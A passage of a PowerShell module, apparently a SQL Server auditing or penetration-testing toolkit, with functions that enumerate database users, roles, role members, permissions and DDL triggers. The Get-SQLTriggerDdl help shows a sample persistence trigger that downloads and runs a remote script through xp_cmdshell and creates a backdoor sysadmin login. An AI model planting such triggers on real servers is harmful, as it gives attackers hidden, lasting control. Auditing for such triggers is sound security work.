New-Object -TypeName System.Data.DataTable # Setup PermissionName filter if($PermissionName) { $PermissionNameFilter = " and pm.permission_name like '$PermissionName'" } else { $PermissionNameFilter = '' } # Setup PermissionName filter if($PrincipalName) { $PrincipalNameFilter = " and rp.name like '$PrincipalName'" } else { $PrincipalNameFilter = '' } # Setup PermissionType filter if($PermissionType) { $PermissionTypeFilter = " and pm.class_desc like '$PermissionType'" } else { $PermissionTypeFilter = '' } } Process { # Note: Tables queried by this function typically require sysadmin privileges. # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Setup NoDefault filter if($NoDefaults) { # Get list of databases $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -NoDefaults -SuppressVerbose } else { # Get list of databases $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -SuppressVerbose } # Get the privs for each database $TblDatabases | ForEach-Object -Process { # Set DatabaseName filter $DbName = $_.DatabaseName # Define Query $Query = " USE $DbName; SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], '$DbName' as [DatabaseName], rp.name as [PrincipalName], rp.type_desc as [PrincipalType], pm.class_desc as [PermissionType], pm.permission_name as [PermissionName], pm.state_desc as [StateDescription], ObjectType = CASE WHEN obj.type_desc IS NULL OR obj.type_desc = 'SYSTEM_TABLE' THEN pm.class_desc ELSE obj.type_desc END, [ObjectName] = Isnull(ss.name, Object_name(pm.major_id)) FROM $DbName.sys.database_principals rp INNER JOIN $DbName.sys.database_permissions pm ON pm.grantee_principal_id = rp.principal_id LEFT JOIN $DbName.sys.schemas ss ON pm.major_id = ss.schema_id LEFT JOIN $DbName.sys.objects obj ON pm.[major_id] = obj.[object_id] WHERE 1=1 $PermissionTypeFilter $PermissionNameFilter $PrincipalNameFilter" # Execute Query if(-not $SuppressVerbose) { Write-Verbose -Message "$Instance : Grabbing permissions for the $DbName database..." } $TblDatabaseTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Append results $TblDatabasePrivs = $TblDatabasePrivs + $TblDatabaseTemp } } End { # Return data $TblDatabasePrivs } } # ---------------------------------- # Get-SQLDatabaseUser # ---------------------------------- # Author: Scott Sutherland Function Get-SQLDatabaseUser { <# .SYNOPSIS Returns database user information from target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DAC Connect using Dedicated Admin Connection. .PARAMETER DatabaseName Database name to filter for. .PARAMETER DatabaseUser Database user to filter for. .PARAMETER PrincipalName Principal name to filter for. .PARAMETER NoDefaults Only show information for non default databases. .EXAMPLE PS C:\> Get-SQLDatabaseUser -Instance SQLServer1\STANDARDDEV2014 -DatabaseName testdb -PrincipalName evil ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 DatabaseName : testdb DatabaseUserId : 5 DatabaseUser : evil PrincipalSid : 3E26CA9124B4AE42ABF1BBF2523738CA PrincipalName : evil PrincipalType : SQL_USER deault_schema_name : dbo create_date : 04/22/2016 13:00:33 is_fixed_role : False [TRUNCATED] .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLDatabaseUser -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server database name.')] [string]$DatabaseName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Database user.')] [string]$DatabaseUser, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Server login.')] [string]$PrincipalName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Do not show database users associated with default databases.')] [Switch]$NoDefaults, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblDatabaseUsers = New-Object -TypeName System.Data.DataTable $null = $TblDatabaseUsers.Columns.Add('ComputerName') $null = $TblDatabaseUsers.Columns.Add('Instance') $null = $TblDatabaseUsers.Columns.Add('DatabaseName') $null = $TblDatabaseUsers.Columns.Add('DatabaseUserId') $null = $TblDatabaseUsers.Columns.Add('DatabaseUser') $null = $TblDatabaseUsers.Columns.Add('PrincipalSid') $null = $TblDatabaseUsers.Columns.Add('PrincipalName') $null = $TblDatabaseUsers.Columns.Add('PrincipalType') $null = $TblDatabaseUsers.Columns.Add('deault_schema_name') $null = $TblDatabaseUsers.Columns.Add('create_date') $null = $TblDatabaseUsers.Columns.Add('is_fixed_role') # Setup PrincipalName filter if($PrincipalName) { $PrincipalNameFilter = " and b.name like '$PrincipalName'" } else { $PrincipalNameFilter = '' } # Setup DatabaseUser filter if($DatabaseUser) { $DatabaseUserFilter = " and a.name like '$DatabaseUser'" } else { $DatabaseUserFilter = '' } } Process { # Note: Tables queried by this function typically require sysadmin or DBO privileges. # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Get list of databases if($NoDefaults) { $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose -NoDefaults } else { $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose } # Get the privs for each database $TblDatabases | ForEach-Object -Process { # Set DatabaseName filter $DbName = $_.DatabaseName if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Grabbing database users from $DbName." } # Define Query $Query = " USE $DbName; SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], '$DbName' as [DatabaseName], a.principal_id as [DatabaseUserId], a.name as [DatabaseUser], a.sid as [PrincipalSid], b.name as [PrincipalName], a.type_desc as [PrincipalType], default_schema_name, a.create_date, a.is_fixed_role FROM [sys].[database_principals] a LEFT JOIN [sys].[server_principals] b ON a.sid = b.sid WHERE 1=1 $DatabaseUserFilter $PrincipalNameFilter" # Execute Query $TblDatabaseUsersTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Update sid formatting for each entry and append results $TblDatabaseUsersTemp | ForEach-Object -Process { # Convert SID to string if($_.PrincipalSid.GetType() -eq [System.DBNull]) { $Sid = '' } else { # Format principal sid $NewSid = [System.BitConverter]::ToString($_.PrincipalSid).Replace('-','') if ($NewSid.length -le 10) { $Sid = [Convert]::ToInt32($NewSid,16) } else { $Sid = $NewSid } } # Add results to table $null = $TblDatabaseUsers.Rows.Add( [string]$_.ComputerName, [string]$_.Instance, [string]$_.DatabaseName, [string]$_.DatabaseUserId, [string]$_.DatabaseUser, $Sid, [string]$_.PrincipalName, [string]$_.PrincipalType, [string]$_.default_schema_name, [string]$_.create_date, [string]$_.is_fixed_role) } } } End { # Return data $TblDatabaseUsers } } # ---------------------------------- # Get-SQLServerRole # ---------------------------------- # Author: Scott Sutherland Function Get-SQLServerRole { <# .SYNOPSIS Returns SQL Server role information from target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER RolePrincipalName Role principal name to filter for. .PARAMETER RoleOwner Role owner name to filter for. .EXAMPLE PS C:\> Get-SQLServerRole -Instance SQLServer1\STANDARDDEV2014 | Select-Object -First 1 ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 RolePrincipalId : 2 RolePrincipalSid : 2 RolePrincipalName : public RolePrincipalType : SERVER_ROLE OwnerPrincipalId : 1 OwnerPrincipalName : sa is_disabled : False is_fixed_role : False create_date : 4/13/2009 12:59:06 PM modify_Date : 4/13/2009 12:59:06 PM default_database_name : .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLServerRole -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Role name.')] [string]$RolePrincipalName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = "Role owner's name.")] [string]$RoleOwner, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Setup table for output $TblServerRoles = New-Object -TypeName System.Data.DataTable $null = $TblServerRoles.Columns.Add('ComputerName') $null = $TblServerRoles.Columns.Add('Instance') $null = $TblServerRoles.Columns.Add('RolePrincipalId') $null = $TblServerRoles.Columns.Add('RolePrincipalSid') $null = $TblServerRoles.Columns.Add('RolePrincipalName') $null = $TblServerRoles.Columns.Add('RolePrincipalType') $null = $TblServerRoles.Columns.Add('OwnerPrincipalId') $null = $TblServerRoles.Columns.Add('OwnerPrincipalName') $null = $TblServerRoles.Columns.Add('is_disabled') $null = $TblServerRoles.Columns.Add('is_fixed_role') $null = $TblServerRoles.Columns.Add('create_date') $null = $TblServerRoles.Columns.Add('modify_Date') $null = $TblServerRoles.Columns.Add('default_database_name') # Setup owner filter if ($RoleOwner) { $RoleOwnerFilter = " AND suser_name(owning_principal_id) like '$RoleOwner'" } else { $RoleOwnerFilter = '' } # Setup role name if ($RolePrincipalName) { $PrincipalNameFilter = " AND name like '$RolePrincipalName'" } else { $PrincipalNameFilter = '' } } Process { # Note: Tables queried by this function typically require sysadmin privileges to get all rows # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Define Query $Query = "SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], principal_id as [RolePrincipalId], sid as [RolePrincipalSid], name as [RolePrincipalName], type_desc as [RolePrincipalType], owning_principal_id as [OwnerPrincipalId], suser_name(owning_principal_id) as [OwnerPrincipalName], is_disabled, is_fixed_role, create_date, modify_Date, default_database_name FROM [master].[sys].[server_principals] WHERE type like 'R' $PrincipalNameFilter $RoleOwnerFilter" # Execute Query $TblServerRolesTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Update sid formatting for each entry $TblServerRolesTemp | ForEach-Object -Process { # Format principal sid $NewSid = [System.BitConverter]::ToString($_.RolePrincipalSid).Replace('-','') if ($NewSid.length -le 10) { $Sid = [Convert]::ToInt32($NewSid,16) } else { $Sid = $NewSid } # Add results to table $null = $TblServerRoles.Rows.Add( [string]$_.ComputerName, [string]$_.Instance, [string]$_.RolePrincipalId, $Sid, $_.RolePrincipalName, [string]$_.RolePrincipalType, [string]$_.OwnerPrincipalId, [string]$_.OwnerPrincipalName, [string]$_.is_disabled, [string]$_.is_fixed_role, $_.create_date, $_.modify_Date, [string]$_.default_database_name) } } End { # Return data $TblServerRoles } } # ---------------------------------- # Get-SQLServerRoleMember # ---------------------------------- # Author: Scott Sutherland Function Get-SQLServerRoleMember { <# .SYNOPSIS Returns SQL Server role member information from target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER RolePrincipalName Role principal name to filter for. .PARAMETER PrincipalName Principal name to filter for. .EXAMPLE PS C:\> Get-SQLServerRoleMember -Instance SQLServer1\STANDARDDEV2014 -PrincipalName MyUser ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 RolePrincipalId : 3 RolePrincipalName : sysadmin PrincipalId : 272 PrincipalName : MyUser ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 RolePrincipalId : 6 RolePrincipalName : setupadmin PrincipalId : 272 PrincipalName : MyUser ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 RolePrincipalId : 276 RolePrincipalName : MyCustomRole PrincipalId : 272 PrincipalName : MyUser .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLServerRoleMember -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Role name.')] [string]$RolePrincipalName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL login or Windows account name.')] [string]$PrincipalName, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblServerRoleMembers = New-Object -TypeName System.Data.DataTable # Setup role name filter if ($RolePrincipalName) { $RoleOwnerFilter = " AND SUSER_NAME(role_principal_id) like '$RolePrincipalName'" } else { $RoleOwnerFilter = '' } # Setup login name filter if ($PrincipalName) { $PrincipalNameFilter = " AND SUSER_NAME(member_principal_id) like '$PrincipalName'" } else { $PrincipalNameFilter = '' } } Process { # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Define Query $Query = " SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance],role_principal_id as [RolePrincipalId], SUSER_NAME(role_principal_id) as [RolePrincipalName], member_principal_id as [PrincipalId], SUSER_NAME(member_principal_id) as [PrincipalName] FROM sys.server_role_members WHERE 1=1 $PrincipalNameFilter $RoleOwnerFilter" # Execute Query $TblServerRoleMembersTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Append as needed $TblServerRoleMembers = $TblServerRoleMembers + $TblServerRoleMembersTemp } End { # Return role members $TblServerRoleMembers } } # ---------------------------------- # Get-SQLDatabaseRole # ---------------------------------- # Author: Scott Sutherland # Reference: https://technet.microsoft.com/en-us/library/ms189612(v=sql.105).aspx Function Get-SQLDatabaseRole { <# .SYNOPSIS Returns database role information from target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DAC Connect using Dedicated Admin Connection. .PARAMETER DatabaseName Database name to filter for. .PARAMETER NoDefaults Only select non default databases. .PARAMETER RolePrincipalName Role principalname to filter for. .PARAMETER RoleOwner Role owner's name to filter for. .EXAMPLE PS C:\> Get-SQLDatabaseRole -Instance SQLServer1\STANDARDDEV2014 -DatabaseName testdb -RolePrincipalName DB_OWNER ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 DatabaseName : testdb RolePrincipalId : 16384 RolePrincipalSid : 01050000000000090400000000000000000000000000000000400000 RolePrincipalName : db_owner RolePrincipalType : DATABASE_ROLE OwnerPrincipalId : 1 OwnerPrincipalName : sa is_fixed_role : True create_date : 4/8/2003 9:10:42 AM modify_Date : 4/13/2009 12:59:14 PM default_schema_name : .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLDatabaseRole -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server database name.')] [string]$DatabaseName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Role name.')] [string]$RolePrincipalName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = "Role owner's name.")] [string]$RoleOwner, [Parameter(Mandatory = $false, HelpMessage = 'Only select non default databases.')] [switch]$NoDefaults, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Setup table for output $TblDatabaseRoles = New-Object -TypeName System.Data.DataTable $null = $TblDatabaseRoles.Columns.Add('ComputerName') $null = $TblDatabaseRoles.Columns.Add('Instance') $null = $TblDatabaseRoles.Columns.Add('DatabaseName') $null = $TblDatabaseRoles.Columns.Add('RolePrincipalId') $null = $TblDatabaseRoles.Columns.Add('RolePrincipalSid') $null = $TblDatabaseRoles.Columns.Add('RolePrincipalName') $null = $TblDatabaseRoles.Columns.Add('RolePrincipalType') $null = $TblDatabaseRoles.Columns.Add('OwnerPrincipalId') $null = $TblDatabaseRoles.Columns.Add('OwnerPrincipalName') $null = $TblDatabaseRoles.Columns.Add('is_fixed_role') $null = $TblDatabaseRoles.Columns.Add('create_date') $null = $TblDatabaseRoles.Columns.Add('modify_Date') $null = $TblDatabaseRoles.Columns.Add('default_schema_name') # Setup RoleOwner filter if ($RoleOwner) { $RoleOwnerFilter = " AND suser_name(owning_principal_id) like '$RoleOwner'" } else { $RoleOwnerFilter = '' } # Setup RolePrincipalName filter if ($RolePrincipalName) { $RolePrincipalNameFilter = " AND name like '$RolePrincipalName'" } else { $RolePrincipalNameFilter = '' } } Process { # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Get list of databases if($NoDefaults) { $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose -NoDefaults } else { $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose } # Get role for each database $TblDatabases | ForEach-Object -Process { # Get database name $DbName = $_.DatabaseName if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Getting roles from the $DbName database." } # Define Query $Query = " USE $DbName; SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], '$DbName' as [DatabaseName], principal_id as [RolePrincipalId], sid as [RolePrincipalSid], name as [RolePrincipalName], type_desc as [RolePrincipalType], owning_principal_id as [OwnerPrincipalId], suser_name(owning_principal_id) as [OwnerPrincipalName], is_fixed_role, create_date, modify_Date, default_schema_name FROM [$DbName].[sys].[database_principals] WHERE type like 'R' $RolePrincipalNameFilter $RoleOwnerFilter" # Execute Query $TblDatabaseRolesTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Update sid formatting for each entry and append results $TblDatabaseRolesTemp | ForEach-Object -Process { # Format principal sid $NewSid = [System.BitConverter]::ToString($_.RolePrincipalSid).Replace('-','') if ($NewSid.length -le 10) { $Sid = [Convert]::ToInt32($NewSid,16) } else { $Sid = $NewSid } # Add results to table $null = $TblDatabaseRoles.Rows.Add( [string]$_.ComputerName, [string]$_.Instance, [string]$_.DatabaseName, [string]$_.RolePrincipalId, $Sid, $_.RolePrincipalName, [string]$_.RolePrincipalType, [string]$_.OwnerPrincipalId, [string]$_.OwnerPrincipalName, [string]$_.is_fixed_role, $_.create_date, $_.modify_Date, [string]$_.default_schema_name) } } } End { # Return data $TblDatabaseRoles } } # ---------------------------------- # Get-SQLDatabaseRoleMember # ---------------------------------- # Author: Scott Sutherland Function Get-SQLDatabaseRoleMember { <# .SYNOPSIS Returns database role member information from target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DAC Connect using Dedicated Admin Connection. .PARAMETER DatabaseName Database name to filter for. .PARAMETER RolePrincipalName Role principalname to filter for. .PARAMETER PrincipalName Name of principal or Role to filter for. .EXAMPLE PS C:\> Get-SQLDatabaseRoleMember -Instance SQLServer1\STANDARDDEV2014 -DatabaseName testdb -PrincipalName evil ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 DatabaseName : testdb RolePrincipalId : 16387 RolePrincipalName : db_ddladmin PrincipalId : 5 PrincipalName : evil ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 DatabaseName : testdb RolePrincipalId : 16391 RolePrincipalName : db_datawriter PrincipalId : 5 PrincipalName : evil .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLDatabaseRoleMember -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server database name.')] [string]$DatabaseName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Role name.')] [string]$RolePrincipalName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL login or Windows account name.')] [string]$PrincipalName, [Parameter(Mandatory = $false, HelpMessage = 'Only select non default databases.')] [switch]$NoDefaults, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblDatabaseRoleMembers = New-Object -TypeName System.Data.DataTable # Setup login filter if ($PrincipalName) { $PrincipalNameFilter = " AND USER_NAME(member_principal_id) like '$PrincipalName'" } else { $PrincipalNameFilter = '' } # Setup role name if ($RolePrincipalName) { $RolePrincipalNameFilter = " AND USER_NAME(role_principal_id) like '$RolePrincipalName'" } else { $RolePrincipalNameFilter = '' } } Process { # Note: Tables queried by this function typically require sysadmin or DBO privileges. # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Get list of databases if($NoDefaults) { $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -NoDefaults -SuppressVerbose } else { $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose } # Get roles for each database $TblDatabases | ForEach-Object -Process { # Get database name $DbName = $_.DatabaseName if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Getting role members for the $DbName database..." } # Define Query $Query = " USE $DbName; SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], '$DbName' as [DatabaseName], role_principal_id as [RolePrincipalId], USER_NAME(role_principal_id) as [RolePrincipalName], member_principal_id as [PrincipalId], USER_NAME(member_principal_id) as [PrincipalName] FROM [$DbName].[sys].[database_role_members] WHERE 1=1 $RolePrincipalNameFilter $PrincipalNameFilter" # Execute Query $TblDatabaseRoleMembersTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Append results $TblDatabaseRoleMembers = $TblDatabaseRoleMembers + $TblDatabaseRoleMembersTemp } } End { # Return data $TblDatabaseRoleMembers } } # ---------------------------------- # Get-SQLTriggerDdl # ---------------------------------- # Author: Scott Sutherland Function Get-SQLTriggerDdl { <# .SYNOPSIS Returns DDL trigger information from target SQL Servers. This includes logon triggers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER TriggerName Trigger name to filter for. .EXAMPLE PS C:\> Get-SQLTriggerDdl -Instance SQLServer1\STANDARDDEV2014 ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 TriggerName : persistence_ddl_1 TriggerId : 1104722988 TriggerType : SERVER ObjectType : SQL_TRIGGER ObjectClass : SERVER TriggerDefinition : -- Create the DDL trigger CREATE Trigger [persistence_ddl_1] ON ALL Server FOR DDL_LOGIN_EVENTS AS -- Download and run a PowerShell script from the internet EXEC master..xp_cmdshell 'Powershell -c "IEX(new-object net.webclient).downloadstring(''https://raw.githubusercontent.com/nullbind/Powershellery/master/Brainstorming/trigger_demo_ddl.ps1'')"'; -- Add a sysadmin named 'SysAdmin_DDL' if it doesn't exist if (SELECT count(name) FROM sys.sql_logins WHERE name like 'SysAdmin_DDL') = 0 -- Create a login CREATE LOGIN SysAdmin_DDL WITH PASSWORD = 'Password123!'; -- Add the login to the sysadmin fixed server role EXEC sp_addsrvrolemember 'SysAdmin_DDL', 'sysadmin'; create_date : 4/26/2016 8:34:49 PM modify_date : 4/26/2016 8:34:49 PM is_ms_shipped : False is_disabled : False .EXAMPLE PS C:\> Get-SQLInstanceDomain | Get-SQLTriggerDdl -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Trigger name.')] [string]$TriggerName, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblDdlTriggers = New-Object -TypeName System.Data.DataTable # Setup role name if ($TriggerName) { $TriggerNameFilter = " AND name like '$TriggerName'" } else { $TriggerNameFilter = '' } } Process { # Note: Tables queried by this function typically require sysadmin privileges to get all rows. # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance 